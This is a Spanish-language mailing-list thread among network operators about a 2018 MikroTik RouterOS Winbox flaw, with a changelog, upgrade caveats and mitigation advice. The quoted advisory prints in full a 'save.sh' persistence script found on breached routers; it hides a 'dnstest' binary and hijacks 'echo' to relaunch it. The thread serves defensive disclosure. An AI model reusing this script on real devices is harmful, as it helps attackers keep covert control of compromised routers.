<div dir="ltr"><div class="gmail_default" style="font-family:tahoma,sans-serif;font-size:small;color:rgb(0,0,0)">Buenas,<br></div><div class="gmail_default" style="font-family:tahoma,sans-serif;font-size:small;color:rgb(0,0,0)">la rama current no solo presenta el inconveniente cuando hay un combo de bridges y switch-chip en uso, sino que al revertir RouterOS a la rama bugfix-only se pierde toda la config ethernet relacionada a los "master-port" (ahora re-lanzados como Bridge Hardware Offloading).<br><br></div><div class="gmail_default" style="font-family:tahoma,sans-serif;font-size:small;color:rgb(0,0,0)">Por suerte ya esta la versión de la rama bugfix-only que resuelve esta vulnerabilidad y pueden actualizar sus MK evitando ese quilombin:<br><br><div class="gmail-reveal-modal-bg" style="display:block"></div><div id="gmail-ver6_40_8" class="gmail-reveal-modal gmail-large gmail-chlog gmail-open" style="display:block;opacity:1" tabindex="0">
What's new in <b>6.40.8</b> (2018-Apr-23 11:34):<br>
<br>
<b>!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;</b><br>
*) certificate - fixed incorrect SCEP URL after an upgrade;<br>
*) health - fixed empty measurements on CRS328-24P-4S+RM;<br>
*) ike2 - use "policy-template-group" parameter when picking proposal as initiator;<br>
*) ipv6 - fixed IPv6 behaviour when bridge port leaves bridge;<br>
*) routerboard - fixed "mode-button" support on hAP lite r2 devices;<br>
*) ssh - fixed SSH service becoming unavailable;<br>
*) traffic-flow - fixed IPv6 destination address value when IPFIX protocol is used;<br>
*) winbox - show "Switch" menu on cAP ac devices;<br>
*) wireless - improved compatibility with BCM chipset devices;
</div><br><br></div><div class="gmail_default" style="font-family:tahoma,sans-serif;font-size:small;color:rgb(0,0,0)">Slds!<br></div></div><div class="gmail_extra"><br><div class="gmail_quote">El 24 de abril de 2018, 7:06, Carriers <span dir="ltr"><<a href="mailto:carriers@dainus.net" target="_blank">carriers@dainus.net</a>></span> escribió:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><div><div dir="auto">Estimados ojo con esa versión yo tube un par de problemas se me iban los ping altisimos . al parecer hay cambios en el enrutamiento<br><br></div>
<div class="gmail_quote"><div><div class="h5">En 24 de abril de 2018, en 06:46, Juan Pablo Orsi <<a href="mailto:juanpablo@internetlocal.com.ar" target="_blank">juanpablo@internetlocal.com.<wbr>ar</a>> escribió:</div></div><blockquote class="gmail_quote" style="margin:0pt 0pt 0pt 0.8ex;border-left:1px solid rgb(204,204,204);padding-left:1ex"><div><div class="h5">
<div class="m_-7431384575656262436entry-content" style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant-numeric:inherit;font-variant-east-asian:inherit;font-stretch:inherit;line-height:1.62em;text-align:justify"><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">En el día de hoy <a href="http://mikrotik.com/" style="box-sizing:border-box;background-color:transparent;color:rgb(33,117,155);margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit" target="_blank">MikroTik</a> ha publicado un<span style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit;color:rgb(255,0,0)"> <a href="https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255" rel="noopener" style="box-sizing:border-box;background-color:transparent;color:rgb(255,0,0);margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit" target="_blank"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">alerta de seguridad</span></a> sobre una <span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">vulnerabilidad en el RouterOS que afecta a todas las versiones desde la v6.29.</span></span></p><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">Según el alerta, indica que la vulnerabilidad ha sido descubierta por ellos mismos y que recomiendan actualizar <span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">ASAP</span> (<span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">lo mas pronto posible</span>).</p><blockquote style="color:rgb(68,68,68);font-family:Georgia,"URW Bookman L",serif;font-size:inherit;box-sizing:border-box;padding:0px;margin:0px 30px 0px 60px;border:0px;font-style:italic;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit;quotes:none"><p style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">La vulnerabilidad permite a una “<em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">herramienta especial</em>” conectar al puerto del Winbox y poder solicitar la base de datos de los usuarios del sistema.</span></p></blockquote><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">Para tomar una medida al respecto se recomienda:</p><ul style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px 30px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit;list-style-position:initial"><li style="box-sizing:border-box;margin:4px 0px 0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">Actualizar a la<span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"> v6.42.1</span> y <span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">v6.43rc4</span> *<span style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit;color:rgb(255,102,0)"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">Con precaución</span></span>(leer mas adelante)</li><li style="box-sizing:border-box;margin:4px 0px 0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">Cerrar el puerto del Winbox para el acceso publico</span>mediante un <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">address list</em> y el <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">firewall</em> en el chain <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">input</em></li><li style="box-sizing:border-box;margin:4px 0px 0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">Limitar el rango de IP permitidos</span> en <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">ip > service > winbox</em> a las redes locales unicamente.</li><li style="box-sizing:border-box;margin:4px 0px 0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">Cambiar las contraseñas de los usuarios.</span></li></ul><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">Es importante tener en cuenta</span>que en las recientes versiones del <span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">RouterOS</span><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"> existe un nuevo esquema en el manejo del bridge</span>, porque lo hay que tener ciertas precauciones al actualizar debido a que se han dado casos de actualizaciones fallidas en configuraciones que tienen bridge y utilizan el chip switch.</p><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">En caso de equipos que se encuentren en producción y no es posible actualizar rápidamente el sistema operativo, es <span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit;color:rgb(255,0,0)">mandatorio que se cierre el acceso del winbox y cambiar las contraseñas de los usuarios.</span></span></p><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">Por el momento no es posible conocer o detectar que el sistema ha sido vulnerado, por lo que también se recomienda aplicar el punto anterior.</p><p style="box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-variant-numeric:inherit;font-variant-east-asian:inherit;font-stretch:inherit;line-height:inherit"><font color="#333333" face="Lato, sans-serif"><span style="font-size:17px"><a href="https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255" target="_blank">https://forum.mikrotik.com/<wbr>viewtopic.php?f=21&t=133533&p=<wbr>656255</a></span></font><br></p><h4 style="color:inherit;font-family:"Open Sans",sans-serif;font-size:18px;box-sizing:border-box;font-weight:300;line-height:1.62em;margin:0px 0px 18px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;letter-spacing:1px"><span style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit;color:rgb(255,0,0)"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">ACTUALIZACION</span></span>:</h4><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">Algunos usuarios están reportan que detectan dos archivos dentro de <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">files</span></em> con el nombre de <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">dnstest</span></em> con contenido binario y <span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">save.sh</em> c</span>on el siguiente contenido:</p><pre style="color:rgb(0,0,0);font-family:Monaco,Consolas,"Lucida Console","Bitstream Vera Sans Mono",monospace;font-size:12px;box-sizing:border-box;overflow:auto;padding:15px;margin-top:0px;margin-bottom:24px;line-height:1.62em;word-break:break-all;word-wrap:break-word;background:rgb(248,248,248);border:1px dashed rgb(227,227,227);border-radius:4px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit">#!/bin/ash
case "$PATH" in
*/usr/local/bin*)
# old versions
dest="/usr/local/bin/"
;;
*)
dest="/flash/bin/"
if [ ! -d "/flash/" ]; then
exit 1
fi
;;
esac
if [ -f $dest/.dnstest ]; then
rm $dest/.dnstest
fi
if [ -f $dest/echo ]; then
rm $dest/echo
fi
if [ -f $dest/.test ]; then
rm $dest/.test
fi
mkdir -p $dest
export PATH=$PATH:$dest
chmod a+x /flash/rw/pckg/dnstest
cp /flash/rw/pckg/dnstest $dest/.dnstest
echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
chmod +x $dest/.test
echo -e "#!/bin/ash\n/$dest.test&\n/<wbr>bin/echo \$*" > $dest/echo
chmod +x $dest/echo
/flash/rw/pckg/dnstest
rm save.sh
</pre><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">El intento tiene el siguiente comportamiento:</span></p><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">Como se observa en la siguiente captura, el primer acceso es un intento fallido del winbox, por lo que se presume que tiene el acceso a la DB de usuarios. Luego el acceso es con el usuario con permisos <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">full.</em></p><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit"><img src="https://i.imgur.com/7XbVAWy.png" alt="Comportamiento de Acceso" style="box-sizing:border-box;border-width:0px;border-style:initial;vertical-align:middle;margin:0px;padding:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit;max-width:100%;height:auto"></p></div>
</div></div><pre class="m_-7431384575656262436blue"><hr><br>Lista mailing list<br><a href="mailto:Lista@arnog.com.ar" target="_blank">Lista@arnog.com.ar</a><br><a href="http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista" target="_blank">http://mailmancabase.<wbr>interdotnet.com.ar/mailman/<wbr>listinfo/lista</a><br></pre></blockquote></div></div><br>______________________________<wbr>_________________<br>
Lista mailing list<br>
<a href="mailto:Lista@arnog.com.ar">Lista@arnog.com.ar</a><br>
<a href="http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista" rel="noreferrer" target="_blank">http://mailmancabase.<wbr>interdotnet.com.ar/mailman/<wbr>listinfo/lista</a><br>
<br></blockquote></div><br><br clear="all"><br>-- <br><div class="gmail_signature" data-smartmail="gmail_signature"><div dir="ltr"><b>Ivan Chapero<br><span style="color:rgb(102,102,102)">Área Técnica y Soporte</span></b><span style="color:rgb(102,102,102)"> </span><br style="color:rgb(102,102,102)"><span style="color:rgb(102,102,102)">Fijo: 03464-470280 (interno 535)</span> | <span style="color:rgb(102,102,102)">Móvil: 03464-155-20282</span> | <span style="color:rgb(102,102,102)">Skype ID: ivanchapero</span><div><span style="color:rgb(102,102,102)">--</span><br style="color:rgb(102,102,102)"><div style="text-align:center"><span style="color:rgb(102,102,102)">GoDATA Banda Ancha - CABLETEL S.A. | Av. 9 de Julio 1163 - 2183 - Arequito - Santa Fe - Argentina</span></div><br><br><br><br><br><br><br></div></div></div>
</div>